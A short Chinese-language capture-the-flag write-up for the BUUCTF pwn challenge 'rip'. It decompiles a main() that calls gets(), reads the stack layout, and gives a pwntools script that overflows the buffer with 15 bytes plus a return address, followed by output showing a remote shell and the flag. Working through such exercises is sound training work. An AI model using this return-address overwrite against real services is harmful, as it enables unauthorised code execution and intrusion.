BUUCTF Pwn rip
下载 rip
main 函数逆向之后
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // [rsp+1h] [rbp-Fh]
puts("please input");
gets(&s, argv);
puts(&s);
puts("ok,bye!!!");
return 0;
}
可见gets没有限制,存在栈溢出;双击s变量查看堆栈信息
-0000000000000010 ; D/A/* : change type (data/ascii/array)
-0000000000000010 ; N : rename
-0000000000000010 ; U : undefine
-0000000000000010 ; Use data definition commands to create local variables and function arguments.
-0000000000000010 ; Two special fields " r" and " s" represent return address and saved registers.
-0000000000000010 ; Frame size: 10; Saved regs: 8; Purge: 0
-0000000000000010 ;
-0000000000000010
-0000000000000010 db ? ; undefined
-000000000000000F s db ?
-000000000000000E db ? ; undefined
-000000000000000D db ? ; undefined
-000000000000000C db ? ; undefined
-000000000000000B db ? ; undefined
-000000000000000A db ? ; undefined
-0000000000000009 db ? ; undefined
-0000000000000008 db ? ; undefined
-0000000000000007 db ? ; undefined
-0000000000000006 db ? ; undefined
-0000000000000005 db ? ; undefined
-0000000000000004 db ? ; undefined
-0000000000000003 db ? ; undefined
-0000000000000002 db ? ; undefined
-0000000000000001 db ? ; undefined
+0000000000000000 s db 8 dup(?)
+0000000000000008 r db 8 dup(?)
+0000000000000010
+0000000000000010 ; end of stack variables
发现存入15个字节即可劫持函数返回地址,payload如下:
┌──(root㉿kali)-[~]
└─# cat rip.py
from pwn import *
p = remote('node4.buuoj.cn', 27876)
o = b'a' * 15 + p64(0x401186)
p.sendline(o)
p.interactive()
┌──(root㉿kali)-[~]
└─# python rip.py
[+] Opening connection to node4.buuoj.cn on port 27876: Done
[*] Switching to interactive mode
$ cat flag
flag{d51f1a15-5c8d-4645-bf57-0f9019531b85}
$ ls
bin
boot
dev
etc
flag
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var